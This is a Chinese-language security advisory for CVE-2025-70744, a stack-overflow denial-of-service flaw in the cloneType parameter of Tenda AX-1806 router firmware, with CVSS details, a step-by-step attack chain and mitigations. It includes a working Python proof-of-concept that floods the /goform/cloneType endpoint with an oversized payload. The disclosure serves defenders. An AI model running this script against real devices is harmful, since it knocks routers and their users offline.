CVE-2025-70744 Tenda AX-1806 cloneType参数栈溢出拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-70744

漏洞类型

栈溢出

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Tenda AX-1806 v1.0.0.1

漏洞概述

CVE-2025-70744是影响Tenda AX-1806 v1.0.0.1路由器固件的高危安全漏洞。该漏洞存在于设备的Web管理界面中，具体位于sub_65B5C函数的cloneType参数处理逻辑。当设备处理包含超长cloneType值的请求时，由于缺乏适当的边界检查，攻击者可构造恶意输入触发栈缓冲区溢出。此漏洞的CVSS评分为7.5，属于高危级别，攻击向量为网络层面，无需任何认证或用户交互即可利用。成功利用此漏洞可导致路由器服务中断，造成拒绝服务(DoS)状态，影响网络的正常运行。对于家庭用户和企业网络而言，该漏洞可能导致网络连接中断，影响正常业务开展。攻击者可在无需获取任何凭证的情况下远程触发此漏洞，使得攻击成本极低但危害极大。建议受影响的用户尽快联系设备厂商获取安全更新，并在等待修复期间采取适当的缓解措施。

技术细节

该漏洞的根本原因在于Tenda AX-1806 v1.0.0.1固件中的sub_65B5C函数对cloneType参数的处理存在栈缓冲区溢出问题。在C语言中，当程序将用户可控的输入数据复制到固定大小的栈缓冲区而未进行长度验证时，会发生栈溢出。攻击者可通过发送精心构造的HTTP请求，在cloneType参数中包含超长的字符串数据。当sub_65B5C函数执行strcpy或类似的字符串复制操作时，超长数据会覆盖栈上的返回地址、保存的寄存器值以及其他关键数据结构。覆盖返回地址后，攻击者可能控制程序执行流程；在简单的DoS场景下，溢出数据会导致程序崩溃或进入异常状态。由于该漏洞位于Web管理功能中，且设备通常暴露Web管理界面于网络，攻击者可通过发送特制的POST或GET请求远程触发漏洞。CVSS向量显示该漏洞的可用性影响为高(H)，而机密性和完整性影响均为无(N)，符合拒绝服务漏洞的特征。修复此漏洞需要在sub_65B5C函数中添加对cloneType参数长度的验证，确保输入数据不超过目标缓冲区的容量。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标Tenda AX-1806路由器，获取其IP地址和管理界面访问地址。路由器默认Web管理界面通常位于192.168.0.1:80

STEP 2

步骤2: 构造恶意请求

攻击者构造包含超长cloneType参数的HTTP POST请求。该参数用于触发sub_65B5C函数中的栈溢出漏洞。payload长度需超过栈缓冲区容量，通常需要数百到数千字节的填充数据

STEP 3

步骤3: 发送攻击请求

通过HTTP协议向路由器的/goform/cloneType端点发送恶意请求。由于漏洞无需认证即可利用，攻击者可直接发送请求

STEP 4

步骤4: 触发栈溢出

sub_65B5C函数接收到超长cloneType参数后，执行字符串复制操作时超出栈缓冲区边界，覆盖返回地址和保存的寄存器值

STEP 5

步骤5: 导致拒绝服务

栈溢出导致程序控制流被破坏，路由器进程崩溃或进入异常状态。Web管理服务无法正常响应，造成设备拒绝服务状态

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-70744 PoC - Tenda AX-1806 Stack Overflow in cloneType Parameter
This PoC demonstrates a stack overflow vulnerability in the sub_65B5C function
of Tenda AX-1806 v1.0.0.1 firmware via the cloneType parameter.
"""

import requests
import sys

target_ip = "192.168.0.1"  # Default Tenda router IP
target_port = 80

def exploit_stack_overflow(target_ip, target_port):
    """
    Send a crafted request with oversized cloneType parameter to trigger stack overflow.
    """
    url = f"http://{target_ip}:{target_port}/goform/cloneType"
    
    # Generate payload with excessive length to overflow the stack buffer
    # The exact buffer size may vary, using 1000 bytes as a test value
    payload = "A" * 1000
    
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0"
    }
    
    data = {
        "cloneType": payload
    }
    
    try:
        print(f"[*] Sending malicious request to {url}")
        print(f"[*] Payload length: {len(payload)} bytes")
        
        response = requests.post(url, data=data, headers=headers, timeout=5)
        
        print(f"[*] Response status code: {response.status_code}")
        
        if response.status_code == 200 or response.status_code == 500:
            print("[+] Possible vulnerability triggered - service may be affected")
        else:
            print("[*] Response received, check device status manually")
            
    except requests.exceptions.Timeout:
        print("[+] Timeout occurred - device may have crashed (DoS successful)")
    except requests.exceptions.ConnectionError:
        print("[+] Connection refused - device may be unavailable (DoS successful)")
    except Exception as e:
        print(f"[-] Error: {str(e)}")

if __name__ == "__main__":
    if len(sys.argv) > 1:
        target_ip = sys.argv[1]
    
    print("=" * 60)
    print("CVE-2025-70744 - Tenda AX-1806 Stack Overflow PoC")
    print("=" * 60)
    
    exploit_stack_overflow(target_ip, target_port)

影响范围

Tenda AX-1806 v1.0.0.1

防御指南

临时缓解措施

在等待官方安全更新期间，建议采取以下临时缓解措施：1) 禁用路由器的远程Web管理功能，仅允许通过本地网络访问管理界面；2) 更改路由器默认管理账户密码，使用强密码策略；3) 在网络边界防火墙或路由器上实施访问控制，限制对管理端口(80/443)的访问来源；4) 监控设备日志，关注异常的认证失败或异常请求模式；5) 如业务允许，考虑暂时更换受影响设备，使用已修复该漏洞的型号或固件版本。